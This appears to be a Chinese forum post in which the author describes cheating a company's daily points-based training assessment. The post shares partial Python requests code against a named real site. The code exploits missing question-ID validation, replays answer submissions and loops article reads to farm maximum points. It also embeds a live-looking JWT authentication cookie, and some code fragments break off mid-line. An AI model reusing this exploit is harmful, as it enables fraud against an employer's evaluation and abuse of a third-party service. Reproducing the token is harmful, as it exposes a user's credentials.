用的是python3
模块request
背景:公司下考核任务,每天不痛不痒刷分,8分,9分,无所谓,30号就能200分了,中秋节前一天,突然账号清零,开始慌了,brup suite 开始搞起,通过找到不验证题目id机制漏洞的,开始写
漏洞利用
代码质量很凌乱,怕被嘲笑,就不贴了
每天满分15分,不是梦
—
—代码—(还是贴下部分代码)
[Python] 纯文本查看 复制代码
########################################取token data={} data['phone'] = input('please input your phone:') # data['phone'] = i headers = {'Host': 'pfjs.annihui.com', 'Connection': 'close', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': 'Mozilla/5.0 (Linux; Android 5.1.1; google Pixel 2 Build/LMY47I; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36', 'Referer': 'https://pfjs.annihui.com/login.html', 'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7', 'Cookie': 'Authentication=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzUxMiJ9.eyJVc2VySWRDbGFpbSI6NTYyNjQ0NywiVXNlck5hbWVDbGFpbSI6IjE3MTU2NDUzMzMyIiwianRpIjoiMTliYjJkMmQtMjQ1MC00YTk1LTkxOGEtNTgyMDJlNDVmYTQxIn0.WYLIEmaa4moIlQJmnpXSk-OlP9Wfu1mupyz8iVrBYTc1CunZZ4ScF13Q3oHAqjQgTMw3y57CjsVwzyxD5v9TK-A4FcLYhlVJMT_H8JgFJ7nf1cpDkj1NCWtXMqANPZwMw0-dI70GORrXR3LYUMn0LRbJps63IeJbAoK8BIK3CsU; UM_distinctid=16d38d29e89da-09401bf751eb5f-763a5a54-64140-16d38d29e8a90; CNZZDATA1277974716=1871229353-1568615658-%7C1568700945; UM_distinctid=16d38d29e89da-09401bf751eb5f-763a5a54-64140-16d38d29e8a90'} # print(data) r = requests.post('https://pfjs.annihui.com/security/login/loginByPhone', data=data, headers=headers)########################################改题目 data1= {'questionAnswer':'[{"id":"15","answer":"B"},{"id":"99","answer":"C"},{"id":"114","answer":"B"},{"id":"151","answer":"C"},{"id":"298","answer":"C"}]','type':'1'} data1['Authentication']=ret_dict['data']['Authentication'] headers = {'Host': 'pfjs.annihui.com', 'Connection': 'close', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Origin': 'https://pfjs.annihui.com', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': 'Mozilla/5.0 (Linux; Android 5.1.1; google Pixel 2 Build/LMY47I; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer': 'https://pfjs.annihui.com/question_test.html', 'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7', 'Cookie': 'UM_distinctid=16d38d29e89da-09401bf751eb5f-763a5a54-64140-16d38d29e8a90; CNZZDATA1277974716=1871229353-1568615658-%7C1568700945; UM_distinctid=16d38d29e89da-09401bf751eb5f-763a5a54-64140-16d38d29e8a90'} r1 = requests.post('https://pfjs.annihui.com/exam/submit_exam', data=data1, headers=headers)########################################循环阅读3分 for i in range(1,4,1): params = {} params['articleId']='238'+str(i) params['Authentication']=token headers = { 'Host': 'pfjs.annihui.com', 'Connection': 'close', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache', 'Accept': 'application/json, text/########################################识图重放攻击 data2= {'questionAnswer':'[{"id":"31","answer":"r"}]','type':'2'} data2['Authentication']=token headers = { 'Host': 'pfjs.annihui.com', 'Connection': 'close', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache', 'Accept': 'application/json, text/javascript, */*; q=0.01',
声明:本站所有资源均由网友分享,如有侵权内容,请在文章下方留言,本站会立即处理。